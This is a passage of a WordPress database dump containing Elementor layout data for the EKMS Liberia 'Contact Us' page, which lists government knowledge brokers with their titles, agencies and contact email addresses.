href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24634,3642,'_elementor_edit_mode','builder'),(24635,3642,'_elementor_template_type','wp-page'),(24636,3642,'_elementor_version','3.0.16'),(24637,3642,'_wp_page_template','default'),(24638,3642,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a 